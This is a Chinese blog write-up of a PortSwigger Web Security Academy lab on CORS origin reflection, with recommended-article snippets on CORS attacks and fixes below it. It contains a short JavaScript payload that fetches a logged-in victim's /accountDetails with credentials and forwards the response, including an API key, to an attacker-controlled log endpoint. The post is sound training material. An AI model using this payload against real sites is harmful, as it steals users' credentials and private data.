CROS跨域漏洞复现分析

最新推荐文章于 2024-01-24 00:26:30 发布
最新推荐文章于 2024-01-24 00:26:30 发布
阅读量522 收藏 8
点赞数 9
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Soda_199/article/details/135509732
版权

复现环境:bp官方靶场Lab: CORS vulnerability with basic origin reflection | Web Security Academy

复现过程:

首先以普通用户的身份登录系统:

1、靶场环境点击access the lab 和给定账号wiener:peter

2、使用wiener:peter登录系统,可以看到该账户的API key,key作为wiener用户的重要信息

然后以攻击者的视角来复现利用CROS漏洞获取用户的重要数据API KEY:

1、找到返回KEY的路径为/accountDetails,并发现返回包中存在Access-Control-Allow-Credentials: true

2、在请求包中添加Origin: https://example.com,响应包中显示Access-Control-Allow-Origin: https://example.com,说明该网站信任有cookie凭据的其他源。根据这点攻击者可以伪造恶意链接,让用户在登录网站的状态下(即有cookie凭据),点击攻击者的链接,最终获取用户的KEY

3、靶场提供了攻击者的服务器环境,点击跳转到攻击者的服务器上,其中URL: https://exploit-0afc00e704a810a980b20c1a017c003d.exploit-server.net/exploit,即让用户点击的恶意链接,我们自己在response的body中写javascript代码,从而达到获取用户KEY的效果

4、这段代码的目的是在让用户点击攻击者的恶意链接https://exploit-0afc00e704a810a980b20c1a017c003d.exploit-server.net/exploit的时候,将用户的/accountDetails页面的response打印出来

<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='/log?key='+this.responseText;
    };
</script>

5、最后攻击者查看恶意链接的access log 即可拿到用户的KEY等敏感信息

以上就是以一个实例来展现攻击者利用CROS跨域问题实施攻击的过程。

Soda_199
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
实战分析和精华总结:CORS跨域资源共享漏洞数据劫持、复现分析、利用及修复过程
代码讲故事
12-03 1456
实战分析和精华总结:CORS跨域资源共享漏洞数据劫持、复现分析、利用及修复过程。 CORS跨域资源共享漏洞与JSONP劫持漏洞类似,都是程序员在解决跨域问题中进行了错误的配置。攻击者可以利用Web应用对用户请求数据包的Origin头校验不严格,诱骗受害者访问攻击者制作好的恶意网站,从而跨域获取受害者的敏感数据,包括转账记录、交易记录、个人身份证号信息、订单信息等等。
CORS跨域资源共享漏洞复现分析、利用及修复过程
heike_Ch的博客
05-18 880
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
CORS跨域资源共享漏洞复现——详细利用方法,漏洞危害最大化
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
06-15 4586
CORS跨域资源共享漏洞漏洞复现cors的利用方式以及让危害最大化。
cors漏洞 复现_WordPress 5.2.4 CORS 漏洞复现
weixin_30481539的博客
02-06 405
0x01 简介WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。CORS(Cross-origin resource sharing:跨域资源共享)是一个浏览器的一种机制。如果一个网站没有通过http协议向浏览器响应 Access-Cont...
使用Spring CROS解决项目中的跨域问题详解
08-25
使用Spring CROS解决项目中的跨域问题详解 在Web开发中,跨域问题是一个常见的烦恼,特别是在前后端分离的项目中。跨域问题的出现是因为浏览器的同源策略限制,导致不同域名之间无法共享资源。为了解决这个问题,...
javascript-cros:跨域的一些问题和方法总结
05-26
javascript-cros 跨域的一些问题和方法总结 一直都说想找个大总结的文章关于跨域的处理奈何度娘上的资料太老旧,自己对于新的知识点又不是十分十分有研究。因此一直让懒癌发作下去。奈何最近做了双失青年,因此有了...
layui-table-cros:layui表格跨域请求
02-21
在layui-table-cros-master压缩包中,可能包含了示例代码、配置文件或其他相关资源,用于演示如何在layui表格中实现跨域请求,并与Java后端的CORS配置相结合。你可以解压文件,查看具体代码和文档,以了解更多实现...
前后端分离跨域问题
01-07
springboot解决跨域有cros,配置就是那几项。 如果把服务端程序部署在nginx上,在nginx 也可以解决,服务端和nginx只用写一个即可, server { listen 3002; server_name localhost; location /ok { proxy_pass ...
Cross Domain-CROS(跨域助手).zip
06-25
Cross Domain will help you to deal with cross domain - CORS problem. This is tool helpful when face with cross domain issue.
CORS-vulnerable-Lab:样本易受攻击的代码及其利用代码
05-05
CORS配置错误易受攻击的实验室 该存储库包含与CORS错误配置相关的易受攻击的代码。 可以在本地计算机上配置易受攻击的代码,以实际利用CORS相关的错误配置问题。 我想对@albinowax(感谢他在CORS开发中的工作),AKReddy和Vivek Sir(感谢始终支持我的杰出人物)和Andrew Sir-@vanderaj(感谢他的鼓励之词)表示感谢 在计算机上设置实验室 以下是在本地/远程计算机上配置易受攻击的代码的先决条件 Apache Web服务器 PHP 5/7 MySQL数据库 配置步骤: 下载并提取Web服务器“ htdocs”或webroot目录中的代码。 打开PHPMyAdmin并创建名称为“ ica_lab”的新数据库。 如果要使用MySQL“ root”用户帐户,请跳过下面提到的步骤,然后跳到步骤no。 5, 通过执行以下提到SQL命令来创建一个名为“
Cors漏洞详解
Askshhbs的博客
04-26 9758
Cors介绍 Cors全称"跨域资源共享"(Cross-origin resource sharing),Cors的出现是用来弥补SOP(同源策略)的不足。在当时SOP有些限制了网页的业务需求,不能够使不同域的网页互相访问,因此提出了Cors:用于绕过SOP(同源策略)来实现跨域资源访问的一种技术。 Cors漏洞就是攻击者利用Cors技术来获取用户的敏感数据,从而导致用户敏感信息泄露。 漏洞原理 Cors请求可分为两类,简单请求和非简单请求。所谓简单请求,就是请求方式为GET,POST,HEAD这三
CORS跨域资源共享漏洞
m0_55772907的博客
10-19 9173
cors漏洞
cors漏洞 复现_BUG赏金 | 关于CORS的一些高级技能
weixin_42298062的博客
02-06 459
本文非常有趣,感兴趣学习的可以花点时间往下看。对于很熟悉或非常熟悉CORS的人来说,直接翻到最下面动动手指点点广告就可以关闭了,谢谢支持!本文翻译自Medium https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397嗨,各位好!我叫A...
cors漏洞 复现_CORS的进阶利用
weixin_33454080的博客
02-06 1221
简介主要看了Corben Leo的Advanced CORS Exploitation Techniques这篇文章,对这篇文章的一个翻译吧,收获良多,复现一下cors漏洞的进阶利用。直入正题。 CORS介绍这里就借OWASP的关于CORS的介绍。CORS stands for Cross-Origin Resource Sharing.Is an feature offering the pos...
Web漏洞CORS跨域资源共享漏洞
Butterfly0011的博客
03-12 4189
文章目录CORS跨域资源共享简单跨域请求非简单请求CORS安全问题CORS漏洞的利用 有关于浏览器的同源策略和如何跨域获取资源,传送门 -->浏览器同源策略和跨域的实现方法 同源策略(SOP)限制了应用程序之间的信息共享,并且仅允许在托管应用程序的域内共享。这有效防止了系统机密信息的泄露。但与此同时,也带来了另外的问题。随着Web应用程序和微服务使用的日益增长,出于实用目的往往需要将信息从...
burp靶场--跨域资源共享(CORS
qq_33168924的博客
01-24 1232
2、完成实验:编制JavaScript来定位本地网络(192.168.0.0/24,端口8080)上的端点,然后使用该端点来识别和创建基于CORS的攻击以删除用户。删除用户carlos。【父域允许子域CORS敏感信息,资源存在xss漏洞,从子域发出xss请求父域敏感信息,并将敏感信息发送到hacker控制的服务器上】1、此网站具有不安全CORS配置,因为它信任所有内部网络来源。发现内部主机:192.168.0.230:8080。
CROS怎么解决跨域
最新发布
06-11
CORS(Cross-Origin Resource Sharing,跨源资源共享)是一种机制,用于在HTTP请求中添加一些额外的头信息,允许浏览器在同源策略限制下向不同源(即非同源域名、协议或端口)发送AJAX请求。CORS解决了JavaScript在浏览器中受限于同源策略,无法直接访问其他域资源的问题。 CORS主要通过服务器响应头部来控制允许哪些源进行跨域请求,以下几个关键的CORS头字段: 1. `Access-Control-Allow-Origin`:指定允许的源,可以是一个具体的URL、通配符(*)或"origin",表示所有来源。 2. `Access-Control-Allow-Methods`:定义哪些HTTP方法(如GET、POST、PUT等)被允许跨域请求。 3. `Access-Control-Allow-Headers`:指定允许的请求头,例如`Content-Type`、`Authorization`等。 4. `Access-Control-Max-Age`:设置预检请求(CORS Preflight)的有效期,避免频繁预检。 5. `Access-Control-Allow-Credentials`:当涉及cookies时,决定是否允许发送cookies到服务器。 如果你在后端开发中遇到跨域问题,可以在响应头中设置这些字段,以允许特定的跨域请求。前端开发者则需要在发起AJAX请求时,正确设置`withCredentials: true`和`Origin`头(如果需要发送cookies),并且处理可能的预检请求(对于`GET`和`OPTIONS`请求)。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值